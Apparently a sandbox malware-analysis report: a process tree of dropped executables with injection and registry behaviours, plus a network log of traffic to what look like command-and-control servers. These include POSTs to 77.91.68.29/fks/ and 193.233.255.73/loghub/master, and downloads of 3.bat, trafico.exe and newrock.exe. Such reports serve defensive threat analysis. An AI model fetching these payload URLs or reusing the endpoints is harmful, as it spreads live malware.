C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5176

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5444

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5840

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
PID:6784

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6376

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
PID:6876

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Modifies registry class
PID:7008

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6600

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:5352

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:6160

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:2796

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6236

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
PID:2820

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:4552

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
PID:1524

C:\Users\Admin\AppData\Roaming\gwdrejs
C:\Users\Admin\AppData\Roaming\gwdrejs
1⤵
- Executes dropped EXE
PID:964
- C:\Users\Admin\AppData\Roaming\gwdrejs
  C:\Users\Admin\AppData\Roaming\gwdrejs
  2⤵
  - Executes dropped EXE
  - Checks SCSI registry key(s)
  - Suspicious behavior: MapViewOfSection
  PID:4364

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:6404

C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
"C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe" -ServerName:ContentProcess.AppX6z3cwk4fvgady6zya12j1cw28d228a7k.mca
1⤵
- Drops file in Windows directory
- Modifies registry class
PID:980

C:\Windows\windefender.exe
C:\Windows\windefender.exe
1⤵
- Executes dropped EXE
- Modifies data under HKEY_USERS
PID:5812

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:5544

C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
1⤵
- Executes dropped EXE
PID:2484

Network

DNS

177.25.221.88.in-addr.arpa

Remote address:

8.8.8.8:53

Request

177.25.221.88.in-addr.arpa

IN PTR

Response

177.25.221.88.in-addr.arpa

IN PTR

a88-221-25-177deploystaticakamaitechnologiescom
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://lgvnr.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 301
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 8
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://nnhmaln.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 304
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:01 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=99
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://kmosriyhc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 170
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://hpvyjkbq.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 315
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://clfmnqc.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 285
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://qniyn.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 261
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 42
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://rgrtcfio.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 331
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=94
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jthmcekvrs.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 228
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=93
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://twusst.net/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 179
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=92
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://ntrnjj.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 145
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://omtryyo.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 282
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://jepudniem.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 316
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:03 GMT
Server: Apache/2.4.41 (Ubuntu)
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://pkdmffo.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 203
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=88
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://tqrbhe.com/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 293
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:04 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 46
Keep-Alive: timeout=5, max=87
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://xsgvxnrmk.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 323
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 403
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
POST

http://77.91.68.29/fks/

Explorer.EXE

Remote address:

77.91.68.29:80

Request

POST /fks/ HTTP/1.1
Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://yxclqexx.org/
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Content-Length: 342
Host: 77.91.68.29

Response

HTTP/1.1 404 Not Found

Date: Mon, 30 Oct 2023 06:48:05 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 41
Keep-Alive: timeout=5, max=85
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
GET

http://77.91.68.249/fuza/3.bat

Explorer.EXE

Remote address:

77.91.68.249:80

Request

GET /fuza/3.bat HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 77.91.68.249

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:48:02 GMT
Server: Apache/2.4.41 (Ubuntu)
Last-Modified: Thu, 26 Oct 2023 20:57:10 GMT
ETag: "156-608a4d0c9149d"
Accept-Ranges: bytes
Content-Length: 342
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
POST

http://193.233.255.73/loghub/master

FB78.exe

Remote address:

193.233.255.73:80

Request

POST /loghub/master HTTP/1.1
Content-Type: multipart/form-data; boundary=2y07PMLRzG9IXosgQ3Lt
Content-Length: 213
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.1)
Host: 193.233.255.73
Connection: Keep-Alive
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 30 Oct 2023 06:48:03 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 8
Connection: keep-alive
X-Frame-Options: DENY
X-Content-Type-Options: nosniff
Referrer-Policy: same-origin
DNS

29.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

29.68.91.77.in-addr.arpa

IN PTR

Response

29.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

249.68.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

249.68.91.77.in-addr.arpa

IN PTR

Response

249.68.91.77.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
DNS

73.255.233.193.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.255.233.193.in-addr.arpa

IN PTR

Response

73.255.233.193.in-addr.arpa

IN PTR

hosted-by yeezyhostnet
GET

http://194.169.175.118/trafico.exe

Explorer.EXE

Remote address:

194.169.175.118:80

Request

GET /trafico.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 194.169.175.118

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:48:04 GMT
Server: Apache/2.4.29 (Ubuntu)
Last-Modified: Sat, 28 Oct 2023 17:08:56 GMT
ETag: "7aa00-608c9dc3e61ec"
Accept-Ranges: bytes
Content-Length: 502272
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: application/x-msdos-program
DNS

118.175.169.194.in-addr.arpa

Remote address:

8.8.8.8:53

Request

118.175.169.194.in-addr.arpa

IN PTR

Response
DNS

170.34.67.172.in-addr.arpa

Remote address:

8.8.8.8:53

Request

170.34.67.172.in-addr.arpa

IN PTR

Response
GET

http://5.42.65.80/newrock.exe

Explorer.EXE

Remote address:

5.42.65.80:80

Request

GET /newrock.exe HTTP/1.1
Connection: Keep-Alive
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Host: 5.42.65.80

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Mon, 30 Oct 2023 06:48:06 GMT
Content-Type: application/octet-stream
Content-Length: 10347008
Last-Modified: Sun, 29 Oct 2023 15:13:05 GMT
Connection: keep-alive
ETag: "653e7681-9de200"
Accept-Ranges: bytes
DNS

80.65.42.5.in-addr.arpa

Remote address:

8.8.8.8:53

Request

80.65.42.5.in-addr.arpa

IN PTR

Response
POST

http://77.91.124.1/theme/index.php

explothe.exe

Remote address:

77.91.124.1:80

Request

POST /theme/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.124.1
Content-Length: 89
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Date: Mon, 30 Oct 2023 06:48:08 GMT
Server: Apache/2.4.41 (Ubuntu)
Content-Length: 6
Content-Type: text/html; charset=UTF-8
DNS

1.124.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

1.124.91.77.in-addr.arpa

IN PTR

Response

1.124.91.77.in-addr.arpa

IN PTR
DNS

www.facebook.com

MicrosoftEdgeCP.exe

Remote address:

8.8.8.8:53

Request

www.facebook.com

IN A

Response

www.facebook.com

IN CNAME

star-mini.c10r.facebook.com

star-mini.c10r.facebook.com

IN A

157.240.201.35
GET

https://www.facebook.com/login

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /login HTTP/2.0
host: www.facebook.com
accept: text/html, application/xhtml+xml, image/jxr, */*
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

vary: Accept-Encoding
content-encoding: br
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
content-security-policy: default-src data: blob: 'self' https://*.fbsbx.com 'unsafe-inline' *.facebook.com *.fbcdn.net 'unsafe-eval';script-src *.facebook.com *.fbcdn.net 'unsafe-inline' blob: data: 'self' 'unsafe-eval';style-src *.fbcdn.net data: *.facebook.com 'unsafe-inline';connect-src *.facebook.com facebook.com *.fbcdn.net wss://*.facebook.com:* wss://*.fbcdn.net attachment.fbsbx.com blob: *.cdninstagram.com 'self' http://localhost:3103 wss://gateway.facebook.com wss://edge-chat.facebook.com wss://snaptu-d.facebook.com wss://kaios-d.facebook.com/ *.fbsbx.com;font-src data: *.facebook.com *.fbcdn.net *.fbsbx.com;img-src *.fbcdn.net *.facebook.com data: https://*.fbsbx.com facebook.com *.cdninstagram.com fbsbx.com fbcdn.net blob: android-webview-video-poster: *.oculuscdn.com;media-src *.cdninstagram.com blob: *.fbcdn.net *.fbsbx.com www.facebook.com *.facebook.com data:;frame-src *.facebook.com *.fbsbx.com fbsbx.com data: *.fbcdn.net;worker-src blob: *.facebook.com data:;block-all-mixed-content;upgrade-insecure-requests;report-uri https://www.facebook.com/csp/reporting/?m=c&minimize=0;
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: same-origin
cross-origin-opener-policy: same-origin-allow-popups
pragma: no-cache
cache-control: private, no-cache, no-store, must-revalidate
expires: Sat, 01 Jan 2000 00:00:00 GMT
x-content-type-options: nosniff
x-xss-protection: 0
x-frame-options: DENY
strict-transport-security: max-age=15552000; preload
content-type: text/html; charset="utf-8"
x-fb-debug: 9RgZczhLCWqosh1tw6V5r+DZNuOpb1TuLmxzr//1ffPdkhLqs5fPFhHA+RP8MjrZSzfe4DNKOweo2/RZ/6gOyA==
date: Mon, 30 Oct 2023 06:48:15 GMT
alt-svc: h3=":443"; ma=86400
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_1.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_card_image_1.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: Nmnpiyrpc00QHVchkNDJDQ==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 23:46:24 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: PKnB4zbxqvZexxZr0vWr3dX0V+PYFUZsLPMDWzWX4NakAWQuwt9YcPyTqlXuxXlFwwKJrDLLgG4oRYWE/Tu37A==
date: Sun, 29 Oct 2023 23:46:24 GMT
content-length: 22180
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_2.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_card_image_2.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: wRZKtl/35CrbFpdeWSFrBg==
edge-control: cache-maxage=86400s
expires: Mon, 30 Oct 2023 23:45:25 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
strict-transport-security: max-age=15552000; preload
x-fb-debug: dpIyALm7eMYYv0pliY5hqvDm4ApK2r4mOeg8wQcGR4J6sIx2EWU75nyXMESUYFYWUUk+PvtU4DR5iKkHnci25Q==
date: Sun, 29 Oct 2023 23:45:25 GMT
content-length: 21306
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_3.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_card_image_3.png HTTP/2.0
host: www.facebook.com
accept: image/png, image/svg+xml, image/jxr, image/*;q=0.8, */*;q=0.5
referer: https://www.facebook.com/login
accept-language: en-US
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.116 Safari/537.36 Edge/15.15063
accept-encoding: gzip, deflate, br

Response

HTTP/2.0 200

content-type: image/png
access-control-allow-origin: *
content-md5: tjvKzjcx509sRQAttysmgw==
edge-control: cache-maxage=86400s
expires: Tue, 31 Oct 2023 05:02:07 GMT
cache-control: public,max-age=86400
reporting-endpoints: default="https://www.facebook.com/ajax/browser_error_reports/?device_level=unknown"
report-to: {"max_age":259200,"endpoints":[{"url":"https:\/\/www.facebook.com\/ajax\/browser_error_reports\/?device_level=unknown"}]}
document-policy: force-load-at-top
permissions-policy: accelerometer=(), ambient-light-sensor=(), bluetooth=(), camera=(self), geolocation=(self), gyroscope=(), hid=(), idle-detection=(), magnetometer=(), microphone=(self), midi=(), payment=(), publickey-credentials-get=(self), screen-wake-lock=(), serial=(), usb=()
cross-origin-resource-policy: cross-origin
cross-origin-opener-policy: same-origin-allow-popups
x-content-type-options: nosniff
timing-allow-origin: *
origin-agent-cluster: ?0
strict-transport-security: max-age=15552000; preload
x-fb-debug: Gq2U1qbB5HZiOgPXg5aGUd6eYY6XEZHg4NI6aPWd0iDZ8oI9KUaYf+xd4rZ3U8AjesPUqksMKJX9/dqOvFJFUQ==
date: Mon, 30 Oct 2023 05:02:07 GMT
content-length: 35554
GET

https://www.facebook.com/images/cookies/cookie_info_card_image_4.png

MicrosoftEdgeCP.exe

Remote address:

157.240.201.35:443

Request

GET /images/cookies/cookie_info_card_image_4.png HTTP/2.0
host: www.facebook.com
